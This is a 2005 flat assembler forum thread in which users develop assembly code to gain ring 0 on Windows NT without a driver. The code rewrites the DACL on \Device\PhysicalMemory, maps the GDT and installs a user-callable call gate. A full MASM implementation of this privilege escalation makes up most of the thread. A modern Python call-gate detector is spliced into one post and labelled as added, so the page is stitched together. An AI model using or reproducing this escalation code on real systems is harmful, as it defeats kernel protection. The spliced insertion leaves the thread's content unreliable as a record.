flat assembler
Message board for the users of flat assembler.

ring 0 without a kernel mode driver
r22



Joined: 27 Dec 2004
Posts: 805
r22 29 Jan 2005, 18:34
I've been wanting to get to r0 without having to use a driver; the following code doesn't work, but it's a start.
Help in finishing it would be appreciated.
Code:
format PE GUI 4.0
entry Start

include '%fasminc%\win32a.inc'

section '.data' data readable writeable
fmt   db '%lu',0
buffr rb 32
rjunk dd 0
myPID dd 0
pAddr dd 0
ntBad dd 0
devPhy db '\',0,'D',0,'e',0,'v',0,'i',0,'c',0,'e',0,'\',0,'P',0,'h',0,'y',0,'s',0,'i',0,'c',0,'a',0,'l',0,'M',0,'e',0,'m',0,'o',0,'r',0,'y',0,0,0
uniPhys db ',',0,2eh,0
    dd devPhy
phyMem db 18h,0,0,0,0,0,0,0
       dd uniPhys
       db 40h,0,0,0
       dd 0,0
hFileMapObj dd 0


section '.code' code readable executable

Start:
        call [GetCurrentProcessId]
        mov [myPID], eax
        db 64h,67h,0FFh,36h,0,0 ; push dword ptr fs:[0]
        db 64h,67h,89h,26h,0,0 ; mov fs:0, esp
        mov esi, 100000h
        push 4
        push 1000h
        push esi
        push 0
        call [VirtualAlloc]
        mov [pAddr], eax
        push dword rjunk
        push esi
        push eax
        push dword 0Bh
        call [NtQuerySystemInformation]

        mov ebx, dword[pAddr]
        mov eax, [ebx+0ch]
        mov [ntBad],eax

        mov edi,phyMem
        mov ebx,hFileMapObj
        push edi
        push dword 2
        push ebx
        call [NtOpenSection]
        push eax
        push fmt
        push buffr
        call [wsprintf]
        push 0
        push buffr
        push buffr
        push 0
        call [MessageBox]
        call [ExitProcess]

r0code:


section '.idata' import data readable writeable

  library kernel32,'KERNEL32.DLL',\
      advapi32,'ADVAPI32.DLL',\
        ntdll,'NTDLL.DLL',\
      user32,'USER32.DLL'
      import ntdll,\
      NtUnmapViewOfSection,'NtUnmapViewOfSection',\
      NtQuerySystemInformation,'NtQuerySystemInformation',\
      NtOpenSection,'NtOpenSection',\
      NtMapViewOfSection,'NtMapViewOfSection'

      include  "%fasminc%\apia\kernel32.inc"
      include  "%fasminc%\apiw\advapi32.inc"
      include  "%fasminc%\apia\user32.inc"


section '.reloc' fixups data discardable
    
HarryTuttle



Joined: 26 Sep 2003
Posts: 211
Location: Poland
HarryTuttle 31 Jan 2005, 20:01
Why

db 64h,67h,0FFh,36h,0,0 instead of simply: push [fs:0]?
Is it better?

:)

_________________
Microsoft: brings power of yesterday to computers of today.
beppe85



Joined: 23 Oct 2004
Posts: 181
beppe85 31 Jan 2005, 20:50
HarryTuttle wrote:
Why

db 64h,67h,0FFh,36h,0,0 instead of simply: push [fs:0]?
Is it better?

:)


The instruction is one byte shorter. I remember I had seen a thread about this, taking a word address to load a dword. Both disassemble the same and do the same.

_________________
"I assemble, therefore I am"

If you got some spare time, visit my blog: http://www.beppe.theblog.com.br/ and sign my guestmap
Tomasz Grysztar



Joined: 16 Jun 2003
Posts: 8356
Location: Kraków, Poland
Tomasz Grysztar 31 Jan 2005, 21:31
It should be:
Code:
push dword [fs:word 0]
r22



Joined: 27 Dec 2004
Posts: 805
r22 01 Feb 2005, 05:49
I made the code in version .56, so I had to use db; in .57 it should work the normal way.
Anyways, I'm going to try and implement the functions in advapi that I need to use to get access to /Device/PhysicalMemory, then I'll repost an update.
r22



Joined: 27 Dec 2004
Posts: 805
r22 01 Feb 2005, 08:24
Code:
format PE GUI 4.0
entry Start

include '%fasminc%\win32a.inc'



section '.data' data readable writeable
fmt   db '%lu',0
buffr rb 32
rjunk dd 0
myPID dd 0
pAddr dd 0
ntBad dd 0
MmIs  db 'MmIsAddressValid',0
MmIsAddressValid dd 0
dAccess db 2,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0
        dd CUser
CUser   db 'C',0,'U',0,'R',0,'R',0,'E',0,'N',0,'T',0,5fh,0,'U',0,'S',0,'E',0,'R',0,0,0

align 4
devPhy db '\',0,'D',0,'e',0,'v',0,'i',0,'c',0,'e',0,'\',0,'P',0,'h',0,'y',0,'s',0,'i',0,'c',0,'a',0,'l',0,'M',0,'e',0,'m',0,'o',0,'r',0,'y',0,0,0
uniPhys db ',',0,2eh,0
        dd devPhy
align 4
phyMem db 18h,0,0,0,0,0,0,0
       dd uniPhys
       db 40h,0,0,0
       dd 0,0
hFileMapObj dd 0
DACL dd 0
NewACL dd 0
SecurityD dd 0
kernelLib dd 0
kernelBase dd 0


section '.code' code readable executable

Start:
        call [GetCurrentProcessId]
        mov [myPID], eax
        push dword [FS: word 0]
        mov [fs: word 0],esp

        push 4
        push 1000h
        push 100000h
        push 0
        call [VirtualAlloc]
        mov [pAddr], eax
        push dword rjunk ;out ret len
        push 100000h
        push dword[pAddr]
        push dword 0Bh
        call [NtQuerySystemInformation]
        mov edx, dword[pAddr]
        mov eax, [edx+0ch]
        mov [ntBad],eax  ;kernel base addr

        push phyMem
        push 60000h ;read write DAC
        push hFileMapObj
        call [NtOpenSection]
        push SecurityD
        push 0
        push DACL
        push 0
        push 0
        push 4
        push 6
        push [hFileMapObj]
        call [GetSecurityInfo]
        push NewACL
        push [DACL]
        push dAccess
        push 1
        call [SetEntriesInAcl] ;WideChar note .idata
        push 0
        push [NewACL]
        push 0
        push 0
        push 4
        push 6
        push [hFileMapObj]
        call [SetSecurityInfo]
        push [NewACL]
        call [LocalFree]
        push [SecurityD]
        call [LocalFree]
        push [hFileMapObj]
        call [CloseHandle]
        push phyMem
        push 2
        push hFileMapObj
        call [NtOpenSection]
        mov edx,[pAddr]
        movzx eax,word[edx+1eh]
        lea eax,[eax+edx+20h]
        push 1
        push 0
        push eax
        call [LoadLibrary]
        mov [kernelLib],eax
        push MmIs
        push eax
        call [GetProcAddress]
        sub eax,[kernelLib]
        add eax,[ntBad]  ;real addr
        mov [MmIsAddressValid],eax
        mov esi,[kernelLib]
        mov ecx,[esi+3ch]
        add ecx,esi
        mov eax,[ecx+34h]
        mov ecx,[ecx+50h]
        add ecx,esi
        mov [kernelBase],eax
        ; ok now find PsActiveProcessHead
        ;first find "push 'egap'" 68 50 41 47 45
morefind:
        cmp     esi,ecx
        jae     failure
        lodsd
        sub     esi,3
        cmp     eax,47415068h
        jnz     morefind
        cmp     byte [esi+3],45h
        jnz     morefind
        dec     esi
;more to come getting close to making the r3 to r0 call gate
        push eax
        push fmt
        push buffr
        call [wsprintf]
failure:
       push 0
       push buffr
       push buffr
       push 0
       call [MessageBox]
        call [ExitProcess]

r0code:


section '.idata' import data readable writeable

  library kernel32,'KERNEL32.DLL',\
          advapi32,'ADVAPI32.DLL',\
          ntdll,'NTDLL.DLL',\
          user32,'USER32.DLL'
      import ntdll,\
      NtUnmapViewOfSection,'NtUnmapViewOfSection',\
      NtQuerySystemInformation,'NtQuerySystemInformation',\
      NtOpenSection,'NtOpenSection',\
      NtMapViewOfSection,'NtMapViewOfSection'

      include  "%fasminc%\apia\kernel32.inc"
      include  "%fasminc%\apiw\advapi32.inc"
      include  "%fasminc%\apia\user32.inc"


section '.reloc' fixups data discardable
    

I had to align phyMem so it would work and I also added the advapi functions needed.
Madis731



Joined: 25 Sep 2003
Posts: 2139
Location: Estonia
Madis731 01 Feb 2005, 08:38
What is the reference you're using? I just can't understand where you get all this.
Tomasz Grysztar



Joined: 16 Jun 2003
Posts: 8356
Location: Kraków, Poland
Tomasz Grysztar 01 Feb 2005, 08:53
One more thing. Instead of:
Code:
db 'C',0,'U',0,'R',0,'R',0,'E',0,'N',0,'T',0,5fh,0,'U',0,'S',0,'E',0,'R',0,0,0

you can write:
Code:
du 'CURRENT_USER',0
HarryTuttle



Joined: 26 Sep 2003
Posts: 211
Location: Poland
HarryTuttle 02 Feb 2005, 08:03
Code:
;**********************************************************************************************;
;                          Attempt at ring0 on an NT-kernel OS                                 ;
;               based on the article "Playing with Windows /dev/(k)mem" by crazylord            ;
;                                                                                              ;
;   27/08/03 Chrishka   comments, suggestions, whatever: chris.j84@free.fr                      ;
;**********************************************************************************************;


.386
.model flat,stdcall
option casemap :none

include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\advapi32.inc

includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\advapi32.lib

;!==================================================================================!;
;   masm32 v8 does not ship a library and an include file for ntdll.dll             ;
;   I threw these together quickly (I only put in what I needed),                   ;
;   if you have a better one, don't hesitate                                        ;
;                                                                                    ;
include \masm32\include\ntdll.inc                                                    ;
includelib \masm32\lib\ntdll.lib                                                     ;
;                                                                                    ;
;!==================================================================================!;



;______________________________________________________________________________________________________________________
;
;   data
;______________________________________________________________________________________________________________________


.data?

    ALIGN   DWORD

        dacl            dd      ?
        nexp            dd      ?

        hPhysicMem      dd      ?

        pSecuDescript   dd      ?

        pOldDacl        dd      ?
        pNewDacl        dd      ?

        unicode_str     dw      ?                                       ;UNICODE_STRING{    USHORT          Length
                        dw      ?                                       ;                   USHORT          MaxLength
                        dd      ?                                       ;                   PWSTR           Buffer };

        obj_attrib      dd      ?                                       ;OBJECT_ATTRIBUTES{ ULONG           Length
                        dd      ?                                       ;                   HANDLE          RootDirectory
                        dd      ?                                       ;                   UNICODE_STRING* ObjectName
                        dd      ?                                       ;                   ULONG           Attributes
                        dd      ?                                       ;                   VOID*           SecurityDescriptor
                        dd      ?                                       ;                   VOID*           SecurityQualityOfService };

        Exp_Access      dd      ?                                       ;EXPLICIT_ACCESS{   DWORD           grfAccessPermissions
                        dd      ?                                       ;                   ACCESS_MODE     grfAccessMode
                        dd      ?                                       ;                   DWORD           grfInheritance
                                                                        ;                   TRUSTEE         Trustee };

                        dd      ?                                       ;TRUSTEE{           TRUSTEE*        pMultipleTrustee
                        dd      ?                                       ;                   MULTIPLE_TRUSTEE_OPERATION MultipleTrusteeOperation
                        dd      ?                                       ;                   TRUSTEE_FORM    TrusteeForm
                        dd      ?                                       ;                   TRUSTEE_TYPE    TrusteeType
                        dd      ?                                       ;                   LPSTR           ptstrName };

        gdt             dw      ?                                       ;KGDTENTRY{         WORD            LimitLow
                        dw      ?                                       ;                   WORD            BaseLow
                        dw      ?                                       ;                   WORD            BaseHigh };

        pad1            dw      ?

        Callgate        dq      ?                                       ;                  PHYSICAL_ADDRESS pAddress
                        dd      ?                                       ;                   VOID*           MappedAddress
                        dd      ?                                       ;                   CALLGATE_DESC*  pDesc
                        dw      ?                                       ;                   WORD            Segment
                        dw      ?                                       ;                   WORD            LastEntry

        ViewSize        dd      ?

        CgCall          df      ?

        pad2            dw      ?

        udevname        db      46 dup(?)

.const

        modname         db      "Ring0",0

        err1            db      "error",0
        err2            db      "error : access denied",0

        devname         db      "\device\physicalmemory",0

        user            db      "CURRENT_USER",0

;______________________________________________________________________________________________________________________


;______________________________________________________________________________________________________________________
;
;   code
;______________________________________________________________________________________________________________________

.code

Start:
;______________________________________________________________________________________________________________________


        invoke      MultiByteToWideChar,CP_ACP,MB_PRECOMPOSED,addr devname,-1,addr udevname,23

        invoke      RtlInitUnicodeString,addr unicode_str,addr udevname

        mov         ebx,offset obj_attrib
        mov         dword ptr [ebx],24                                    ; sizeof(OBJECT_ATTRIBUTES)
        mov         dword ptr [ebx+4],NULL
        mov         dword ptr [ebx+8],offset unicode_str
        mov         dword ptr [ebx+12],OBJ_CASE_INSENSITIVE
        or          dword ptr [ebx+12],OBJ_KERNEL_HANDLE
        mov         dword ptr [ebx+16],NULL
        mov         dword ptr [ebx+20],NULL

        mov         edx,SECTION_MAP_READ
        or          edx,SECTION_MAP_WRITE
        invoke      NtOpenSection,addr hPhysicMem,edx,ebx

        .IF eax != ERROR_SUCCESS
            .IF eax == ACCESS_DENIED
                jmp         needrw
            .ELSE
                invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
                jmp         fin
            .ENDIF
        .ELSE
            mov         pOldDacl,NULL
            jmp     rw
        .ENDIF

needrw: mov         edx,WRITE_DAC
        or          edx,READ_CONTROL
        invoke      NtOpenSection,addr hPhysicMem,edx,addr obj_attrib

        .IF eax != ERROR_SUCCESS
            .IF eax == ACCESS_DENIED
                invoke      MessageBox,NULL,addr err2,addr modname,MB_OK
                jmp         fin
            .ELSE
                invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
                jmp         fin
            .ENDIF
        .ENDIF


        invoke      GetSecurityInfo,hPhysicMem,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,addr pOldDacl,NULL,addr pSecuDescript

        .IF eax != ERROR_SUCCESS
            invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
            jmp         fin
        .ENDIF


        mov         ebx,offset Exp_Access
        mov         dword ptr [ebx],SECTION_ALL_ACCESS
        mov         dword ptr [ebx+4],GRANT_ACCESS
        mov         dword ptr [ebx+8],NO_INHERITANCE
        mov         dword ptr [ebx+12],NULL
        mov         dword ptr [ebx+16],NO_MULTIPLE_TRUSTEE
        mov         dword ptr [ebx+20],TRUSTEE_IS_NAME
        mov         dword ptr [ebx+24],TRUSTEE_IS_USER
        mov         dword ptr [ebx+28],offset user

        invoke      SetEntriesInAcl,1,addr Exp_Access,pOldDacl,addr pNewDacl

        .IF eax != ERROR_SUCCESS
            invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
            jmp         fin
        .ENDIF


        invoke      SetSecurityInfo,hPhysicMem,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL

        .IF eax != ERROR_SUCCESS
            invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
            jmp         fin
        .ENDIF


        invoke      LocalFree,pNewDacl
        invoke      LocalFree,dacl
        invoke      LocalFree,pSecuDescript
        invoke      NtClose,hPhysicMem
        mov         hPhysicMem,NULL

;______________________________________________________________________________________________________________________
;
;   installing the call gate
;______________________________________________________________________________________________________________________


        mov         edx,SECTION_MAP_READ
        or          edx,SECTION_MAP_WRITE
        invoke      NtOpenSection,addr hPhysicMem,edx,addr obj_attrib

        .IF eax != ERROR_SUCCESS
            .IF eax == 0C0000022h
                invoke      MessageBox,NULL,addr err2,addr modname,MB_OK
                jmp         fin
            .ELSE
                invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
                jmp         fin
            .ENDIF
        .ENDIF


rw:     sgdt        gdt
        mov         ebx,offset gdt
        movzx       eax,word ptr [ebx+2]
        movzx       edx,word ptr [ebx+4]
        shl         edx,16
        or          edx,eax

        .IF (edx < 80000000h) || (edx >= 0A0000000h)
            and         edx,0FFFF000h
        .ELSE
            and         edx,1FFFF000h
        .ENDIF

        mov         ebx,offset Callgate

        mov         dword ptr [ebx],edx
        mov         dword ptr [ebx+4],0

        push        PAGE_READWRITE
        push        0
        push        1
        movzx       edx,word ptr gdt
        mov         ViewSize,edx
        push        offset ViewSize
        mov         eax,offset Callgate
        push        eax
        push        edx
        push        0
        add         eax,8
        push        eax
        push        -1
        push        hPhysicMem
        call        NtMapViewOfSection

        .IF eax != ERROR_SUCCESS
            invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
            jmp         fin
        .ENDIF


        mov         ebx,offset Callgate
        mov         dword ptr [ebx+12],NULL
        mov         dx,gdt
        and         dx,0FFF8h
        movzx       eax,dx
        mov         ecx,[ebx+8]
        add         eax,ecx

        .WHILE eax > ecx                                                ; look for a free call gate descriptor in the GDT.
                                                                        ; check whether the 'present' bit is 0. if it is
            and         byte ptr [eax+5],80h                            ; 1, the slot is taken, so...
            jne         @f                                              ; ... look elsewhere

            mov         edx,Ring0
            mov         word ptr [eax],dx                               ; low word of the Ring0 function's address
            mov         word ptr [eax+2],KGDT_R0_CODE
            mov         byte ptr [eax+4],1                              ; number of Ring0 parameters, we pass 1 parameter
                                                                        ; careful, the parameter count is only encoded in the
                                                                        ; first 4 bits of this byte, so no more than 15 parameters,
                                                                        ; otherwise bits that must be 0 in this byte get set to 1
            mov         byte ptr [eax+5],0ECh
            shr         edx,16
            mov         word ptr [eax+6],dx                             ; high word of the Ring0 function's address
            mov         dword ptr [ebx+12],eax
            jmp         fwh

@@:         sub         eax,8

        .ENDW

fwh:
        .IF dword ptr [ebx+12] == NULL                                                 ; did we find a free call gate descriptor? if not, stop here
            invoke      MessageBox,NULL,addr err1,addr modname,MB_OK
            jmp         fin
        .ENDIF


        mov         edx,offset CgCall
        sub         eax,ecx
        or          al,3
        mov         word ptr [edx+4],ax
        mov         dword ptr [edx],0

;______________________________________________________________________________________________________________________
;
;   Calling the Ring0 function
;______________________________________________________________________________________________________________________


        push        12345678h                                           ; example parameter
        call        fword ptr [CgCall]

;______________________________________________________________________________________________________________________
;
;   Uninstalling the call gate + a bit of cleanup
;______________________________________________________________________________________________________________________


        mov         ebx,offset Callgate
        mov         edi,[ebx+12]
        xor         eax,eax
        stosd
        stosd

        invoke      NtUnmapViewOfSection,-1,dword ptr [ebx+8]
        invoke      NtClose,hPhysicMem

        .IF pOldDacl != NULL
            mov         edx,WRITE_DAC
            or          edx,READ_CONTROL
            invoke      NtOpenSection,addr hPhysicMem,edx,addr obj_attrib
            invoke      GetSecurityInfo,hPhysicMem,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,addr pOldDacl,NULL,addr pSecuDescript
            mov         ebx,offset Exp_Access
            mov         dword ptr [ebx],SECTION_ALL_ACCESS
            mov         dword ptr [ebx+4],REVOKE_ACCESS
            mov         dword ptr [ebx+8],NO_INHERITANCE
            mov         dword ptr [ebx+12],NULL
            mov         dword ptr [ebx+16],NO_MULTIPLE_TRUSTEE
            mov         dword ptr [ebx+20],TRUSTEE_IS_NAME
            mov         dword ptr [ebx+24],TRUSTEE_IS_USER
            mov         dword ptr [ebx+28],offset user
            invoke      SetEntriesInAcl,1,addr Exp_Access,pOldDacl,addr pNewDacl
            invoke      SetSecurityInfo,hPhysicMem,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL
            invoke      NtClose,hPhysicMem
        .ENDIF

;______________________________________________________________________________________________________________________


fin:    invoke      ExitProcess,0

;______________________________________________________________________________________________________________________


;______________________________________________________________________________________________________________________
;
;   THE function that will run in kernel mode
;   it does nothing, it's up to you to fill it in :), but /!\ careful /!\, the system
;   recovers very badly from an error in kernel mode, handle it with care,
;   I got dozens of blue screens on 2000 while developing this thing...
;______________________________________________________________________________________________________________________


Ring0 PROC

        pushf                                           ; save the flags

        mov         eax,[esp+10]                        ; fetch the parameter into eax.

        cli                                             ; some privileged instructions...
        mov         ebx,cr0
        mov         ecx,dr7                             ; dedicated to roticv lol

        popf                                            ; restore the flags, re-enabling interrupts along the way
        retf        4                                   ; pop one dword off the stack

Ring0 ENDP

;______________________________________________________________________________________________________________________


end             Start
    

_________________
Microsoft: brings power of yesterday to computers of today.
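A defender-side check built on the descriptor layout the MASM code above writes (address low word at bytes 0-1, KGDT_R0_CODE at bytes 2-3, parameter count in byte 4, access byte 0ECh at byte 5, address high word at bytes 6-7): an added Python example, not part of the original post, that decodes 8-byte GDT entries and flags present call gates with DPL 3 whose entry point is a user-space address, which is what this technique leaves behind in a GDT dump taken from a memory image. The GDT bytes, the 2 GB user/kernel split and the 0x401000 target address are constructed for the example.

```python
import struct
from dataclasses import dataclass

KGDT_R0_CODE = 0x08            # ring-0 code selector the page's code places in the gate
USER_SPACE_LIMIT = 0x80000000  # assumed 2 GB user/kernel split (32-bit Windows, no /3GB)


@dataclass
class CallGate:
    index: int        # descriptor slot in the GDT (selector >> 3)
    offset: int       # 32-bit entry point the gate transfers control to
    selector: int     # code segment selector the gate switches to
    param_count: int  # dwords copied from the caller's stack to the new stack
    dpl: int          # privilege level a caller needs in order to use the gate
    present: bool


def decode_call_gate(entry: bytes, index: int):
    """Decode one 8-byte descriptor; return a CallGate if it is a 32-bit call gate, else None."""
    if len(entry) != 8:
        raise ValueError("a GDT descriptor is exactly 8 bytes")
    off_lo, selector, count_byte, access, off_hi = struct.unpack("<HHBBH", entry)
    # access byte: P (bit 7) | DPL (bits 6-5) | S (bit 4) | type (bits 3-0)
    is_system = (access & 0x10) == 0   # S=0 marks gates, TSS and LDT descriptors
    gate_type = access & 0x0F          # 0xC is the 32-bit call gate type
    if not is_system or gate_type != 0x0C:
        return None
    return CallGate(
        index=index,
        offset=(off_hi << 16) | off_lo,
        selector=selector,
        param_count=count_byte & 0x1F,  # the Intel manual reserves 5 bits for the count
        dpl=(access >> 5) & 0x3,
        present=bool(access & 0x80),
    )


def find_suspicious_call_gates(gdt: bytes):
    """Flag present call gates usable from ring 3 whose entry point lies in user space."""
    findings = []
    for index in range(len(gdt) // 8):
        gate = decode_call_gate(gdt[index * 8:index * 8 + 8], index)
        if gate is None or not gate.present:
            continue
        if gate.dpl == 3 and gate.offset < USER_SPACE_LIMIT:
            findings.append(gate)
    return findings


def make_call_gate(offset: int, selector: int, params: int, access: int) -> bytes:
    """Pack a call gate descriptor in the byte layout the assembly above writes."""
    return struct.pack("<HHBBH", offset & 0xFFFF, selector, params, access, offset >> 16)


def make_segment(access: int) -> bytes:
    """Flat 4 GB code or data segment (base 0, limit 0xFFFFF, G=1, D=1)."""
    return struct.pack("<HHBBBB", 0xFFFF, 0, 0, access, 0xCF, 0)


# Constructed GDT dump; slot 4 mirrors the page's code (selector 08h, 1 parameter, access 0ECh).
SAMPLE_GDT = b"".join([
    bytes(8),                                           # slot 0: null descriptor
    make_segment(0x9B),                                 # slot 1: ring-0 code (KGDT_R0_CODE)
    make_segment(0x93),                                 # slot 2: ring-0 data
    make_call_gate(0x80401000, KGDT_R0_CODE, 0, 0x8C),  # slot 3: ring-0-only gate into kernel space
    make_call_gate(0x00401000, KGDT_R0_CODE, 1, 0xEC),  # slot 4: ring-3 gate into a user-mode image
    make_call_gate(0x00401000, KGDT_R0_CODE, 1, 0x6C),  # slot 5: same bytes but P=0 (free slot)
])

if __name__ == "__main__":
    for gate in find_suspicious_call_gates(SAMPLE_GDT):
        print(f"slot {gate.index}: selector {gate.selector:#06x} -> {gate.offset:#010x} "
              f"(DPL {gate.dpl}, {gate.param_count} param) callable from ring 3")
```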
r22



Joined: 27 Dec 2004
Posts: 805
r22 02 Feb 2005, 18:54
Yep, that's the stuff; porting it to fASM from mASM is a pain in EL BUTT though :P
BoR0



Joined: 12 Nov 2004
Posts: 31
BoR0 03 Feb 2005, 22:03
Hi guys. I've been all over the net and couldn't find ntdll.inc and ntdll.lib (though I found some files, the equates were not there).

I'd really appreciate it if you could zip that masm "ring3 to ring0" source with all the needed lib and include files.

Thanks. :)
r22



Joined: 27 Dec 2004
Posts: 805
r22 04 Feb 2005, 02:03
The ntdll includes and libs aren't in the version of masm32 I have; I assume they were user-made and not included with the code snippet from Harry Tuttle.

It's a shame the MASM source is so ambiguous. I guess the person coding it was trying to optimize; also, I don't read the language the comments are in :P

I wanted to compile it and then just use my disassembler to look at the source without all the macros.
Copyright © 1999-2024, Tomasz Grysztar.